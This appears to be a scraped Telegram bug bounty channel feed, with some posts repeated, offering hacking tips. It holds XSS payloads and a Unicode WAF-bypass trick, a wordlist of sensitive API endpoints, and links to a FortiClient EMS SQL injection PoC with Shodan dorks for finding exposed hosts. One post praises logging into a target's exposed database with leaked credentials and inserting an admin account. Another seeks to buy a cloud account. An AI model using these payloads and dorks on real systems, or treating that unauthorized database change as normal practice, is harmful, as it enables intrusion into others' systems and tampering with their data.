🔥 Phantom — Autonomous AI Red Team Agent
⚔️ LLM-Powered Offensive Security Automation Framework
👉 https://github.com/kmdn-ch/phantom-ethical-redteam
⚔️ LLM-Powered Offensive Security Automation Framework
👉 https://github.com/kmdn-ch/phantom-ethical-redteam
❤7
Brut Security
🔥 FREE for the first 20 people — no catch. I just launched the Bug Bounty Masterclass PDF on Topmate. Built for absolute beginners. No fluff. No theory for the sake of theory. Just the exact process real hunters use. ━━━━━━━━━━━━━━━ 🎁 FIRST 20 GET IT FREE…
10 Free Coupons - https://topmate.io/saumadip/2009859?coupon_code=awxe
topmate.io
Bug Bounty Masterclass with Saumadip Mandal
Beginner to bug bounty hunter — tools, recon & real PoCs.
🔥5❤1👨💻1
🔥 XSS Tip: Unicode Normalization
Don't give up if <, >, " or ' are filtered ! Many apps normalize Unicode after the WAF/security layer.
Some bypass variants (URL-encoded):
🔹 < ➔ %EF%BC%9C
🔹 > ➔ %EF%BC%9E
🔹 " ➔ %EF%BC%A2
🔹 ' ➔ %EF%BC%87
🔹 ` ➔ %EF%BD%80
For example, inject %EF%BC%9Cscript%EF%BC%9E and check if it reflects as <script> in the DOM.
Automate these quirks with recollapse : https://github.com/0xacb/recollapse
#BugBounty #BugBountyTips #XSS #Pentest #Infosec #CyberSecurity
Don't give up if <, >, " or ' are filtered ! Many apps normalize Unicode after the WAF/security layer.
Some bypass variants (URL-encoded):
🔹 < ➔ %EF%BC%9C
🔹 > ➔ %EF%BC%9E
🔹 " ➔ %EF%BC%A2
🔹 ' ➔ %EF%BC%87
🔹 ` ➔ %EF%BD%80
For example, inject %EF%BC%9Cscript%EF%BC%9E and check if it reflects as <script> in the DOM.
Automate these quirks with recollapse : https://github.com/0xacb/recollapse
#BugBounty #BugBountyTips #XSS #Pentest #Infosec #CyberSecurity
GitHub
GitHub - 0xacb/recollapse: REcollapse is a helper tool for black-box regex fuzzing to bypass validations and discover normalizations…
REcollapse is a helper tool for black-box regex fuzzing to bypass validations and discover normalizations in web applications - 0xacb/recollapse
❤12👍1
Hey Hunter’s,
DarkShadow is here back again!
"Sensitive Information Leak & Missing Authorization via API Endpoint"
- to find info leak bugs in wordpress use my this quick wordlist:
So guys if you really enjoy to read such methods shows your love🔥
#bugbountytips #info_leak
DarkShadow is here back again!
"Sensitive Information Leak & Missing Authorization via API Endpoint"
- to find info leak bugs in wordpress use my this quick wordlist:
/api/v1/export/data
/api/v1/config
/api/debug/env
/api/v2/auth/sessions
/api/v1/admin/users
/wp-json/wordfence/v1/config
/api/v1/billing/details
/api/v1/db/stats
/api/v1/logs
/api/v1/health
/api/v1/status
/api/v1/internal/settings
/api/v1/cloud/credentials
/api/v1/user/profile
/api/v1/system/info
/api/v1/backup/list
/wp-json/wp/v2/users
/wp-json/wp/v2/settings
/wp-json/wp/v2/media
/wp-json/wp/v2/posts?status=any
/wp-json/wp/v2/pages?status=private
/wp-json/elementor/v1/system-info
So guys if you really enjoy to read such methods shows your love🔥
#bugbountytips #info_leak
❤10🔥5
Hey Hunter’s,
DarkShadow is here back again!
🔥Private Messages Leaks via api endpoint💀
tip:
if you guy’s want to know more info leak bugs methods, let me know…
#bugbountytips #info_leak
DarkShadow is here back again!
🔥Private Messages Leaks via api endpoint💀
tip:
> if your target using any open source projects, then collect all /api routes from github.
> use ffuf, burp, gf (do recon as much possible) it can uncovered information leak bugs.
if you guy’s want to know more info leak bugs methods, let me know…
#bugbountytips #info_leak
❤8👍1
Please open Telegram to view this post
VIEW IN TELEGRAM
❤11
Bug Bounty Masterclass is live — 11 chapters, real HackerOne PoCs, step-by-step recon workflow.
First 20 get it FREE.
https://topmate.io/saumadip/2009859?coupon_code=bokac
First 20 get it FREE.
https://topmate.io/saumadip/2009859?coupon_code=bokac
topmate.io
Bug Bounty Masterclass with Saumadip Mandal
Beginner to bug bounty hunter — tools, recon & real PoCs.
👍6🗿3❤2
Hi everyone,
This is DarkShadow.
I’m currently looking for an Oracle Cloud account with Pay-As-You-Go enabled. If anyone has one available and is willing to sell, please feel free to reach out.
Contact: @darkshadowshellsec
Serious sellers only. Thank you.
This is DarkShadow.
I’m currently looking for an Oracle Cloud account with Pay-As-You-Go enabled. If anyone has one available and is willing to sell, please feel free to reach out.
Contact: @darkshadowshellsec
Serious sellers only. Thank you.
❤1
Hey Hunter’s,
DarkShadow is here back again!
"if SSRF is not works in image url parameter then try XSS"
in image parameter you can use these type of payloads:
Now guy’s show you love🔥
#bugbountytips #xss
DarkShadow is here back again!
"if SSRF is not works in image url parameter then try XSS"
in image parameter you can use these type of payloads:
<svg/onload=eval(atob(‘YWxlcnQoJ1hTUycp’))>
<svg onload=eval(http://window.name)>
"><svg onload=prompt(document.domain);>.png
嘼svg><script>a<!>l<!>e<!>r<!>t<!>(<!>1<!>)</script>
Now guy’s show you love🔥
#bugbountytips #xss
❤8🔥5👍1
🚨 Bug Bounty / Red Team Tip
CVE-2026-21643 — Critical Pre-Auth SQL Injection (CVSS 9.1) in FortiClient EMS 7.4.4 (multi-tenant mode only)
Unauthenticated attackers can inject arbitrary SQL via the Site HTTP header to the public endpoint
- Affected: Only FortiClient EMS 7.4.4 (multi-tenant/Sites feature enabled)
- Not affected: 7.2.x, 8.0.x, single-site deployments
- Fixed: Upgrade to 7.4.5 or later
- Status: Actively exploited in the wild + public PoCs available
Main Detail Article (Highly Recommended):
Bishop Fox deep-dive with exploitation paths, payloads (e.g.,
https://bishopfox.com/blog/cve-2026-21643-pre-authentication-sql-injection-in-forticlient-ems-7-4-4
Public PoC (GitHub):
https://github.com/0xBlackash/CVE-2026-21643
Useful Google/Shodan Dorks:
-
-
-
- Shodan:
Quick Check:
If your EMS login page is internet-facing and running 7.4.4 with multi-tenant enabled → patch ASAP or block public access. Thousands of instances are exposed (Shadowserver ~2k+, Shodan ~1k+).
High-value target for hunters. Patch or restrict immediately!
#BugBounty #RedTeam #Fortinet #CVE202621643 #SQLi
CVE-2026-21643 — Critical Pre-Auth SQL Injection (CVSS 9.1) in FortiClient EMS 7.4.4 (multi-tenant mode only)
Unauthenticated attackers can inject arbitrary SQL via the Site HTTP header to the public endpoint
/api/v1/init_consts (or login endpoint). This happens before authentication and hits the PostgreSQL backend with superuser-level access in many setups → full DB dump, schema extraction, or RCE (via PostgreSQL features like COPY FROM PROGRAM).- Affected: Only FortiClient EMS 7.4.4 (multi-tenant/Sites feature enabled)
- Not affected: 7.2.x, 8.0.x, single-site deployments
- Fixed: Upgrade to 7.4.5 or later
- Status: Actively exploited in the wild + public PoCs available
Main Detail Article (Highly Recommended):
Bishop Fox deep-dive with exploitation paths, payloads (e.g.,
pg_sleep(5) for blind testing), and lab results → https://bishopfox.com/blog/cve-2026-21643-pre-authentication-sql-injection-in-forticlient-ems-7-4-4
Public PoC (GitHub):
https://github.com/0xBlackash/CVE-2026-21643
Useful Google/Shodan Dorks:
-
http.title:"FortiClient EMS" "7.4.4"-
http.html:"FortiClient Enterprise Management Server"-
http.favicon.hash: -specific-hash (or search for EMS login page)- Shodan:
"Model: FCTEMS" or "FortiClient EMS"Quick Check:
If your EMS login page is internet-facing and running 7.4.4 with multi-tenant enabled → patch ASAP or block public access. Thousands of instances are exposed (Shadowserver ~2k+, Shodan ~1k+).
High-value target for hunters. Patch or restrict immediately!
#BugBounty #RedTeam #Fortinet #CVE202621643 #SQLi
❤12👍4🔥4
Please don’t forget to react to the post and share it. Your reactions motivate us to post more content like this. You can also tap the ⭐️ to show your support. Thanks!😋 😋 😋
Please open Telegram to view this post
VIEW IN TELEGRAM
5❤12
Hey Hunters,
DarkShadow here back again!
out-of-scope target can lead to an in-scope critical vulnerability!
The story starts from a normal endpoint. When I clicked it, it redirected me somewhere else, and after resolving something, it returned the content. To check further what’s going on, I opened the request in Burp Suite. The endpoint performed a 302 redirect to an external domain, which was out of scope.
But here’s the twist—it was still showing the content from the original website I had requested. So I thought, maybe it’s working like a proxy?
Here comes the real mastery. Most bug hunters ignore this kind of behavior, but I decided to dig deeper. And yeah, I found a file: backup.zip
I instantly unzipped it and noticed a config/ folder, and inside it—a config.php file.
Guess what?
I found MySQL database credentials, and the most interesting part? The database URL was publicly accessible—not just localhost!
I tried connecting… and boom! I was successfully connected.
But wait—this domain is out of scope, right?
That’s what I thought too… until I started reading there massive database and was shocked—
It was the target's database, exposed through their proxy server, which had the hardcoded credentials in the config file.
At that moment, I was really excited.
Then I thought: What if I create a new user with admin role?
So I did exactly that—added an admin user to the database.
Now, on the target website, there’s a normal login page (not labeled as admin login), but I tried logging in with the new credentials and guess what?
BOOM! 💥
It logged me into the admin dashboard.
And just like that, I turned an out-of-scope target into a critical in-scope auth bypass vulnerability.✅
So guys, if you enjoyed this method, don’t forget to show some love—and please, pray for me, I’m really sick right now.
And don’t forget to follow me on X (Twitter): x.com/Darkshadow2bd
#bugbountytips #infosec
DarkShadow here back again!
out-of-scope target can lead to an in-scope critical vulnerability!
The story starts from a normal endpoint. When I clicked it, it redirected me somewhere else, and after resolving something, it returned the content. To check further what’s going on, I opened the request in Burp Suite. The endpoint performed a 302 redirect to an external domain, which was out of scope.
But here’s the twist—it was still showing the content from the original website I had requested. So I thought, maybe it’s working like a proxy?
Here comes the real mastery. Most bug hunters ignore this kind of behavior, but I decided to dig deeper. And yeah, I found a file: backup.zip
I instantly unzipped it and noticed a config/ folder, and inside it—a config.php file.
Guess what?
I found MySQL database credentials, and the most interesting part? The database URL was publicly accessible—not just localhost!
I tried connecting… and boom! I was successfully connected.
But wait—this domain is out of scope, right?
That’s what I thought too… until I started reading there massive database and was shocked—
It was the target's database, exposed through their proxy server, which had the hardcoded credentials in the config file.
At that moment, I was really excited.
Then I thought: What if I create a new user with admin role?
So I did exactly that—added an admin user to the database.
Now, on the target website, there’s a normal login page (not labeled as admin login), but I tried logging in with the new credentials and guess what?
BOOM! 💥
It logged me into the admin dashboard.
And just like that, I turned an out-of-scope target into a critical in-scope auth bypass vulnerability.✅
So guys, if you enjoyed this method, don’t forget to show some love—and please, pray for me, I’m really sick right now.
And don’t forget to follow me on X (Twitter): x.com/Darkshadow2bd
#bugbountytips #infosec
X (formerly Twitter)
DarkShadow (@darkshadow2bd) on X
Ethical Hacker | Penetration Tester | Security Researcher | Bug Hunter | Exploit Developer.
🔥~For more Join my New telegram Channel👉🏼 https://t.co/9p1yvzluA4 ✨
🔥~For more Join my New telegram Channel👉🏼 https://t.co/9p1yvzluA4 ✨
❤7👍2
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5
🔥 XSSnow — Advanced XSS Payload Generator & Testing Platform
⚔️ Dynamic XSS Payload Generation for Web Security Testing
📌 GitHub Repository
👉 https://github.com/dr34mhacks/xssnow
📌 Live Payload Platform
👉 https://xssnow.in/payloads.html
⚔️ Dynamic XSS Payload Generation for Web Security Testing
📌 GitHub Repository
👉 https://github.com/dr34mhacks/xssnow
📌 Live Payload Platform
👉 https://xssnow.in/payloads.html
❤9
🚀 Snapchat SSL Bypass (2026) is now available — arm64-v8a only
I’ve just released my custom Frida SSL bypass script for the Snapchat Android application, fully updated to support the latest 2026 versions.
✅ Supported architecture: arm64-v8a only
Built and tested by me from scratch to support mobile security research, traffic inspection, and dynamic application analysis.
🔗 Frida CodeShare: https://codeshare.frida.re/@mr-blackhole/snapchat-ssl-bypass-all-new-version-of-2026/
Credit @shaho_it
I’ve just released my custom Frida SSL bypass script for the Snapchat Android application, fully updated to support the latest 2026 versions.
✅ Supported architecture: arm64-v8a only
Built and tested by me from scratch to support mobile security research, traffic inspection, and dynamic application analysis.
🔗 Frida CodeShare: https://codeshare.frida.re/@mr-blackhole/snapchat-ssl-bypass-all-new-version-of-2026/
Credit @shaho_it
❤13